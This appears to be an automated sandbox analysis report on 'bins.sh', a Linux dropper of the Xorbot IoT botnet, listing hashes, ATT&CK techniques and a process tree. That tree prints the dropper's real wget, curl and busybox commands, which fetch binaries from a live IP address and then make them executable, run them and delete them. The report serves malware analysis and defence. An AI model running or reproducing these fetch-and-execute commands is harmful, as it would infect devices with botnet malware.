xorbot | 3404137c0765d015c748fae94b035e9e728e78ac85c9ea81992ba3a0dce96f35

Analysis

max time kernel
8s
max time network
11s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11/12/2024, 16:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

ebc0c82c0e23fd014e8f04fd87507349
SHA1

766664536fa298899ab7e3d6d792d614e1c11d0c
SHA256

3404137c0765d015c748fae94b035e9e728e78ac85c9ea81992ba3a0dce96f35
SHA512

82f98c0f995649ed1bec121d570ae17ad195379595ca4583fb900c23c64a7f773b561c2f35b6462022c40bb3e392cdf20706bb4a9c798e95fd072ab1a8e0f239
SSDEEP

96:uPP63Z+kcgN6lTDXIPnsozMLMP65N9PP63bZ+kcgN8lvHDXIPnlvBk5mqL6P85NU:5+kcg47AMAP65nkcgXWo9

Score

10^/10

xorbot antivm botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
692	chmod
704	chmod
710	chmod

Executes dropped EXE 3 IoCs

ioc	pid	Process
/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	693	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
/tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V	705	VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
/tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ	711	MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ

Checks CPU configuration 1 TTPs 3 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 6 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
689	busybox
693	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
695	rm
671	wget
679	curl

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	wget
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	curl
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	busybox
File opened for modification	/tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V	curl
File opened for modification	/tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:663
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:665
- /usr/bin/wget
  wget http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:671
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:679
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:689
- /bin/chmod
  chmod 777 pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - File and Directory Permissions Modification
  PID:692
- /tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  ./pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:693
- /bin/rm
  rm pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  PID:695
- /usr/bin/wget
  wget http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:696
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:700
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:702
- /bin/chmod
  chmod 777 VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  ./VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - Executes dropped EXE
  PID:705
- /bin/rm
  rm VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:706
- /usr/bin/wget
  wget http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:707
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:708
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:709
- /bin/chmod
  chmod 777 MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - File and Directory Permissions Modification
  PID:710
- /tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  ./MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - Executes dropped EXE
  PID:711
- /bin/rm
  rm MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:712
- /usr/bin/wget
  wget http://37.44.238.68/bins/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  PID:713

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V

Filesize
555B

MD5
c3da85a3173a4ec9d42682016f6a69e2

SHA1
b644cacfbf06e841788ab8deb5e388ef7ddf982d

SHA256
77df749f6bbe85442500437f7e798f46b9635da344811ae3b4bf7d43048ee9bb

SHA512
ff3c45bb810169a269b1d0edcfc251c2b31e4acaec0acf1f8a561752b261fcba76ad0f5f5b298f64c50afa7ac9b99262b25af161451e83b14b202c8d33f2eaeb

Download Submit
/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74

Filesize
112KB

MD5
05d7857dcead18bbd86d2935f591873c

SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985

SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads